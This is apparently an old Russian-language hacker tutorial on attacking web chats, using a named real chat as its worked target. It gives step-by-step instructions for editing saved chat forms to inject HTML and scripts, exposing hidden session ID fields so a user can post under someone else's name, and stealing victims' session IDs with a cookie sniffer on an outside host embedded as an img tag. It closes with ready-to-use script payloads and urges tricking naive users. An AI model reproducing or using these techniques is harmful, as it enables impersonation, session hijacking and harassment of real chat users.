эх сегодня столкнулся с флудерами на чате вотнемного как вообще взломать чат
Что такое взлом чата?
В общем взлома чата в определённой степени не существует, однако взломом чатов называется поиск и выявление в нём уязвимых мест, которые позволяют производить действия в чате запрещённые администратором или модератором.
Какие чаты ломают чаще всего?
Как правило взламываются плохоадминистрируемые чаты, то есть те чаты, на которых нет администратора и можно творить что угодно: от написания пакостных слов и простого флуда до скажем подвешивания чата на определённое время, например, до появления этого самого администратора. Второе место занимают чаты, на которых админы есть, но появляются редко или по расписанию (днём есть, ночью нет). И последнее место занимают чаты, на которых постоянно торчит администратор, оно и понятно кому хочется быть выкинутым из чата или отключенным на определённое время, но при определённых действиях можно ломать и такие чаты, хотя это немного сложнее и требует определённого подхода.
И так приступим на практике взламывать чат.
Мной был выбран чат, который находится по адресу color=#000099> color=#003399>http://chat.trax.r color=#003399>u/и ни чем особым не отличается от других чатов. Также хочу сказать, что этот чат был совершенно случайно выбран по принципу, что первое попалось. Для того чтобы начать взламывать чат, вам необходимо на него зайти и хоть пять минут пообщяться с народом, узнать, есть ли у чата админ и если есть, где он и когда приходит. Допустим админа нет и вам повезло, так как в таких чатах можно творить всё что угодно. Когда вы выяснили всё насчёт админа, выходите из чата и перезайдите в него под другим ником (именем), если вам непонятно зачем это, то я поясню, что пока взлом не совершен, лучше делать его под тем ником, который вы не используете для избежания оскорблений в чате в ваш адрес и не портить имидж своего настоящего ника. При входе в чат под "левым" ником желательно в поле ввода ника для проверки ввести какой-нибудъ тег, например, <font>НИК</font>, хотя закрывать тег не обязательно, а в поле ввода ника это будет выглядеть вот так
size=2>Ник
size=2>Цвет
Конечно, входная форма в чат может быть и другая, но так как почти везде используются поля ввода имени и его цвета, я в качестве примера указал только их, в других случаях поиск уязвимостей происходит аналогичным способом, проверяя каждое поле ввода. Итак входите в чат, если вы увидите, что ваше имя в чате отображается как size=2>НИК, вам очень круто повезло, если чат отображает ник как size=2><font>НИК</font>, то администраторы позаботились о запрете и проверке вводимых пользователями символов. Если ваш ник напечатался в чате вместе с тегом, то выходите из чата. Теперь перейдём к процедуре поиска уязвимости в поле для выбора цвета. Для этого нам необходимо сохранить входную страничку. Для тех, кто не знает как это делать, обьясняю: в любом месте странички (если она не использует фреймов) кликните правой клавишей мыши и в появившемся диалоговом меню выберите "просмотр в виде HTML", затем в открывшемся новом окне выберите "Файл-->Сохранить как", где задайте любое имя файла на ваш вкус (если оно вас не устраивает) и выберите директорию, куда будете сохранять, но лучше всего сохранить страничку выбрав в меню браузера "Файл-->сохранить как". Ну вот входная страничка у нас на винчестере. Открываете только что сохранённый файл и ищите там выбор цвета, код выглядит так:
<b>Цвет:</b>
<SELECT NAME="text_color">
<OPTION selected VALUE="Black" STYLE="color:black">Чёрный </OPTION>
<OPTION VALUE="blue" STYLE="color:blue">Синий </OPTION>
<OPTION VALUE="Fuschia" STYLE="color:fuschia">Розовый </OPTION>
<OPTION VALUE="gray" STYLE="color:gray">Серый </OPTION>
<OPTION VALUE="green" STYLE="color:green">Зелёный </OPTION>
<OPTION VALUE="lime" STYLE="color:lime">Яркозелёный </OPTION>
</SELECT></TD>
теперь вставляем несколько строчек, например:
<OPTION VALUE="red" STYLE="color:blue">Красный</OPTION> и <OPTION VALUE="blue><h1>" STYLE="color:blue">А это тег</OPTION>. После этого сохраняем все указанные изменения (если у вас файл сохранён с расшерением txt, переименуйте его в HTML) и запускаем. Теперь у нас в поле выбора цвета появился новый цвет "красный" и надпись "А это тег", вводим ник и выбераем красный цвет. затем нажимаем войти в чат. И что мы видим теперь: ник у нас в отличии от других красный, хотя такого цвета нет ни у кого. Перезаходим, но выбираем уже пункт " А это тег", входим в чат и что видим: наш ник стал большим и пишем мы большим текстом в отличии от других. Однако, обращаю внимание, что данная операция может и не получиться, так как многие чаты контролируют вход и проверяют на ввод метасимволов то есть <>. Однако, если вам предоставляют солидный выбор цветовой гаммы на входе, а писать большими буквами для вас слишком мало, то бросьте эту затею, я лишь описал места, где могут быть недостатки в безопасности чата. Хотя я всегда проверяю на такие вещи - это даёт больше возможности узнать о системе чата и её защиты. Куда интереснее писать от чужого ника, вставлять бегущие строки и т.д., т.п. Конечно взлом входной странички делать вам этого не позволит, да и когда захочется сменить скрипт туда сюда мотаться перезаходя в чат неудобно. Поэтому мы перейдём к самому распространённому взлому. Ранее я говорил о неком чате, на примере которого я и расскажу как взламывать. Вся дальнейшая методика взлома идентична и на других дырявых чатах кроме адресов. Зайдите на чат color=#000099> color=#003399>http://chat.trax.r color=#003399>u/под любым ником (дизигн чата отвратителен своим красным цветом) и сохраните себе мессагу (то откуда вы отправляете сообщения). Кликнув правой клавишей мыши на форме и в появившемся диологовом меню выберите "показать в HTML" далее "файл--> сохранит как". Переименуйте сохранённую мессагу из формата TXT в формат HTML. Мессага отправки сообщений там выглядит так:
Действие: Лично:
Цвет: Стиль:
Для того чтобы иметь возможность вставлять скрипты, писать от чужого ника или просто писать из сохранённой мессаги нам придётся её немного отредактировать. Хочу сказать, что метод взлома данного чата в принципе ни чем не отличается от взлома многих других чатов. С самого начала надо научить нашу сохранённую мессагу отправлять сообщения в чат, для этого необходимо найти вот такую строчку:
<FORM action="chat1.php3" method="GET" name="chatinput" target="_fmsgs" onSubmit="banner();">
Их должно быть две, одна для отправки сообщений в чат, другая для приватных сообщений, обе их надо исправить. Для того чтобы вам было понятно, что делает эта строчка мы пойдём поэтапно. В этой строчке говориться куда отпровляются введённые вами на форме данные, а именно они отпровляются в файл chat1.php3 находящийся на сервере. Для того чтобы наша мессага могла отправлять сообщения в чат, нам необходимо прописать полный путь до этого самого файла. Поле исправления - строки: <FORM action="chat1.php3" method="GET" name="chatinput" target="_fmsgs" onSubmit="banner();"> они будут выглядеть следующим образом: <FORM action="http://chat.trax.ru/chat1.php3" method="GET" name="chatinput" target="_fmsgs" onSubmit="banner();">. Теперь наша мессага умеет отправлять сообщения в чат, но этого не достаточно для вставки скриптов и писанины от чужого ника. Для этого необходимо отредактировать и добавить ещё несколько строк. Например, многим извесно, что выбираемые параметры в большинстве не проверяются на ввод. Большинство чатов имеют уязвимости при выборе цвета, например, если в чате есть вот такая строка:
<OPTION selected VALUE="Black" STYLE="color:black">Чёрный </OPTION> , то небольшим методом модифицирования её можно вставить в чат скрипт, изменив её вот так: <OPTION selected VALUE="Black><script" STYLE="color:black">Чёрный </OPTION>, но в этом чате оказалось, что данные значения проверяются на правильность ввода, за что надо отдать должное программистам этого чата, хотя всё же они забыли или им было лень писать скрипт на проверку ещё нескольких параметров ввода. Итак давайте пойдём дальше и научим нашу мессагу вставлять скрипты и писать от чужого ника. Для этого нам понадобятся небольшие знания как работает чат, чтобы избежать глупых вопросов. При входе в чат вам на одну сессию выдают ID, который присваивается вашему нику и мессаге отправки сообщений, для того чтобы обезопасить чат от подделки отправки сообщений от чужого ника. Если вы перезайдёте в чат, ID сменится, и так будет происходить каждый раз. Сведения о вашем ID в чате содержится в скрытом поле HIDEN, которому соответствует код
<INPUT TYPE="Hiden" NAME="User" VALUE="43082">
<INPUT TYPE="Hiden" NAME="UniqueID" VALUE="306413b18694eae96f">
Для того чтобы быстро менять наш старый id на новый, нам необходимо поправить этот код, заменив скрытое поле HIDEN на текстовое поле TEXT, после редактирования кода он будет выглядеть вот так:
<INPUT TYPE="text" NAME="User" VALUE="43082">
<INPUT TYPE="text" NAME="UniqueID" VALUE="306413b18694eae96f">
Теперь давайте обратим наш взгляд на поле "действие", которое можно изменить по вашему вкусу, если вы хотели бы отправлять не стандартные, а свои настроения или другие ужасные слова. Для этого найдём код:
<b>Действие:</b> <SELECT name="Intonation" size="1">
<OPTION selected value="">говорить</OPTION>
<OPTION value="(смущаясь)">смущаясь</OPTION>
<OPTION value="(игриво)">игриво</OPTION>
<OPTION value="(орёт)">орёт</OPTION>
<OPTION value="(кричит)">кричит</OPTION>
<OPTION value="(плача)">плача</OPTION>
<OPTION value="(радостно)">радостно</OPTION>
<OPTION value="(расстроенно)">расстроено</OPTION>
и заменим в нём надписи находящиеся в скобках "(смущаясь)" на какое-нибудь ваше страшное слово "(страшное слово)". Далее нам придётся не редактировать, а добавлять строчки, сколько их будет зависит только от ваших знаний или желания. Сейчас мы будем учить нашу мессагу отправлять скрипты в чат. Как я сказал, отправка скрипта в этом чате с функции выбора цвета не выйдет, но есть ещё поле ввода "стиль" вот на нём-то чат и "попался", если посмотреть на код отправки параметров стиля, мы можем обнаружить много интересного, давайте его рассмотрим:
<b>Стиль:</b>
<SELECT NAME="text_style">
<OPTION selected VALUE=""> Обычный </OPTION>
<OPTION VALUE="B"> Жирный </OPTION>
<OPTION VALUE="I"> Курсив </OPTION>
</SELECT>
Мы видим заключенные в кавычки две буквы B и I, которые в HTML делают шрифт наклонным или жирным. Обратите внимание, что тег записан без скобок <> в то время как в HTML тег пишется <B> и <I>, из этого понятно, что чату просто передаётся параметр, а скобки добавляются автоматически, из этого следует, что наши скрипты будут писаться без <> тоесть img src=http://www.xyecocka.com/pic/21/06.jpg , а не как это принято в HTML <img src="http://www.xyecocka.com/pic/21/06.jpg">. Давайте добавим несколько строк со скриптами в меню "СТИЛЬ". После добавления код может выглядеть вот так:
<SELECT NAME="text_style">
<OPTION selected VALUE=""> Обычный </OPTION>
<OPTION VALUE="B">Жирный</OPTION>
<OPTION VALUE="I">Курсив</OPTION>
<OPTION VALUE="marquee">бегущая строка</OPTION>
<OPTION VALUE="h1">Большой текст</OPTION>
<OPTION VALUE="plaintext">уничтожает текст</OPTION>
<OPTION VALUE="button">кнопка</OPTION>
<OPTION VALUE="TEXTAREA">Текстовое поле</OPTION>
<OPTION VALUE="img src=http://www.xyecocka.com/pic/21/06.jpg">Просто картинка</OPTION>
</SELECT>
Теперь сохраните все изменения и обновите вашу только что взломанную мессагу нажав на иконку "обновить" или клавишу F5.
У вас должна получиться примерно вот такая мессага
Действие: Лично:
Цвет: Стиль:
Теперь остаётся только писать сообщения в вашей взломанной мессаге и выбирать в "Стиле" скрипт, который будет вставлен в чат.
Ну ты и начиркал тут всякого! Лучше скажи мне, что это за циферки в новых полях и откуда они взялись?
Эти циферки и есть ID твоего ника и мессаги с которой ты отправляешь сообщения. Естественно, что при новом заходе в чат вам выдадут новый ID и отправка сообщений от старого ID будет не возможной, эти циферки можно извлечь при просмотре HTML кода мессаги чата, они будут видны в строках:
<INPUT TYPE="HIDEN" NAME="User" VALUE="43082">
<INPUT TYPE="HIDEN" NAME="UniqueID" VALUE="306413b18694eae96f">
Бери цифры, содержащиеся в поле VALUE, и вставляй в свою взломанную мессагу тесть в те новые поля.
Как вставлять скрипты мне понятно, а как писать от чужого ника?
Для того чтобы писать от чужого ника, необходимо узнать ID его имени и мессаги для того, чтобы захватить удалённый конроль над его мессагой (правда контроль немного ограничен и позволяет отправлять от его имени сообщения, при более продвинутом хакинге можно производить и другие неприятные для жертвы вещи). Теперь давайте поговорим, как же похитить ID жертвы и отправлять сообщения от его имени. Для получения ID жертвы можно воспользоваться множествоми способов. Например, создать на любом из халявных сервисов, которые дают дисковое пространство под размещение собственного сайта, например, narod.ru, страничку со скриптом, который будет отправлять кукисы жертвы вам на мыло, естественно если он придёт на эту страничку. Заманивать жертву на собственную страничку - процесс довольно не сложный, а вот разбираться в его кукисах довольно трудоёмкое дело, поэтому рассмотрим только те способы, которые нам позволят быстро получить всю интересующую нас информацию о пользователе.
Способ "намбер уан"
Используем снифер. Если вы умеете программировать, советую сочинить собственный снифер. Для тех, кто не разбирается в программировании, советую использовать снифер хакзоны или найти на просторах киберпространства cgi снифер и установить его на собственном сайте. Однако давайте по порядку. Снифер - это некий ява аплет написанный на языке Java. Выглядит он как обычная картинка. Способ работы и идея снифера очень проста, заключённый в модуль SRC ява аплет собирает данные с компьютеров жертв и отправляет их в cgi скрипт, который и ведёт лог файл полученных данных. Как я уже говорил в предыдущих статьях, всё что заключено в модуль SRC запускается на компьютере жертвы беспрепятственно. Надеюсь, вы уже поняли, что при запуске снифера на компьютере жертвы вы сможете получить все интересующие данные. Использование снифера может применятся в различных целях не только в чатах, но и для получения вашего логина и пароля на доступ в сеть, однако эту часть я опущу, так как мы говорим о чатах. Итак снифер хакзоны находится по адресу color=#000066>http://www.hackzone.ru/cgi-bin/sniff.cgi? , а лог файл color=#000066>http://www.hackzone.ru/files/snifflog.txt , для того чтобы вытащить ID жертвы из чата, нам необходимо запустить снифер на его компьютере, конечно можно снифер пустить по всему чату, но тогда придётся шарахаться по лог файлу в поисках нужного ID, поэтому лучше всего отправить снифер в приват жертве. Снифер вставляется следующим образом: <img src=http://www.hackzone.ru/cgi-bin/sniff.cgi?>. После того как вы отправили снифер жертве, лезьте и смотрите лог файл, в самом верху будет содержаться его IP адрес, название чата и ID жертвы. Копируйте ID жертвы в свою взломанную мессагу и пишите от его ника любые сообщения. Так же можно скопировать из лог файла полный путь до чата вместе с ID и вставить его в новое окно браузера - это позволит просматривать его приватные сообщения, а путём нехитрого переправления названия чата вы можете добиться и других интересных вещей.
Ну теперь я понял что и к чему!
Вот видите, мы разбили мнение некоторых хакерских сайтов о том, что чаты с полем <TEXTAREA> и написанные на языке программирования PHP не поддаются взлому.
А как же насчёт чата АРИЯ, ведь его не взломаешь?
Чат ариа тоже не без дырок, например, там можно вставлять тег FONT у которого есть атрибут onClick, то есть обработка клика по надписи. Конечно, чат арии обскриптован очень хорошо, однако даже при событии onClick можно придумать множество всяких пакостей для наивных пользователей, надо лишь заставить жертву кликнуть на вашу надпись. Так что можете скачать программу "Засада" и сами попробовать пошутить над наивными пользователями, 80% из них тиснет на вашу надпись. Так же при помощи снифера хакзоны и скриптов можно вытащить ID наивной жертвы и писать от его имени даже в таком обскриптованном чате как АРИЯ.
Не мог бы ты дать пару, тройку скриптов для чатов?
Конечно могу, но только для изучения, любое использование этих скриптов как и этой статьи в целом ложится только на ваши плечи.
Небольшое землетресение чата при каждом обновлении
<script> n=2; for (i =20; i > 0; i--) { for (j = n; j > 0; j--) { parent.parent.window.moveBy(0,i); parent.parent.window.moveBy(i,0); parent.parent.window.moveBy(0,-i); parent.parent.window.moveBy(-i,0); } } </SCRIPT>
Открытие левого окна при входе в чат
<script language='JavaScript'> top.location.href = 'http://mp3.ru/cgi/chat/chat.cgi' </script>.
Текст большими буквами + картинка
<font color='00ff00" style="font-size:200px;font-family:Impact;background:url(http://smartbastard.narod.ru/img/logo.jpg)" "'>HI ALL</font>